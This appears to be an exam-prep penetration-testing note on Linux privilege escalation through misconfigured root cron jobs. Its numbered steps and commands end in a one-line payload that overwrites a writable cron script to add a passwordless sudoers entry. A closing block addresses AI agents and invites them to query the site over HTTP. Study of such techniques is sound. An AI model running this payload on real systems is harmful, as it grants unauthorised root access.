# Exploiting Misconfigured Cron Jobs

## Cron Jobs

* Linux implements task scheduling through a utility called Cron.
* Cron is a time-based service that runs applications, scripts and other commands repeatedly on a specified schedule.
* An application, or script that has been configured to be run repeatedly with Cron is known as a Cron job. Cron can be used to automate or repeat a wide variety of functions on a system, from daily backups to system upgrades and patches.
* The crontab file is a configuration file that is used by the Cron utility to store and track Cron jobs that have been created.

## Exploiting Misconfigured Cron Jobs

* Cron jobs can also be run as any user on the system, this is a very important factor to keep an eye on as we will be targeting Cron jobs that have been configured to be run as the “root” user.
* This is primarily because, any script or command that is run by a Cron job will run as the root user and will consequently provide us with root access.
* In order to elevate our privileges, we will need to find and identify cron jobs scheduled by the root user or the files being processed by the cron job.

## **Attack Flow: Gaining Privilege via Cron Jobs**

## **1. Identify Cron Jobs for the Current User**

Start by listing all cron jobs for the user account you have access to:

```bash
crontab -l
```

If no cron jobs are listed or you need to check system-wide cron jobs, proceed to the next step.

### **2. Search for Cron Job Files with Higher Privileges**

Look for files related to cron jobs that might be owned by higher-privileged users. Use the `grep` command to find references to these files:

```bash
grep -rnw /usr -e "<file_path>"
```

Replace `<file_path>` with the path to the cron job file you found. This command will search for occurrences of the file path in `/usr` directory.

### **3. Inspect the Results**

Review the files listed by the `grep` command. Look for files that you can edit and that have an associated cron job.

### **4. Append Code to Gain Sudo Permissions**

If you find an editable file associated with a cron job, append the following code to it to grant yourself `sudo` permissions:

{% code overflow="wrap" %}

```bash
printf '#!/bin/bash\necho "<your_user> ALL=NOPASSWD:ALL" >> /etc/sudoers' > <vulnerable_file>
```

{% endcode %}

Replace `<your_user>` with your actual username and `<vulnerable_file>` with the path to the file you are modifying.

### **5. Wait for the Cron Job to Execute**

The cron job will run at its scheduled time. You need to wait for it to complete.

### **6. Verify Your Sudo Permissions**

After the cron job runs, check if you have gained `sudo` permissions:

```bash
sudo -l
```

If you see that you have `NOPASSWD` permissions, you have successfully escalated your privileges.

***

***

***

**`Hacker's Mantra:`**`Never underestimate the determination of a kid who is time-rich and cash-poor. - Cory Doctorow`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/system-host-based-attacks/linux-privilege-escalation/exploiting-misconfigured-cron-jobs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.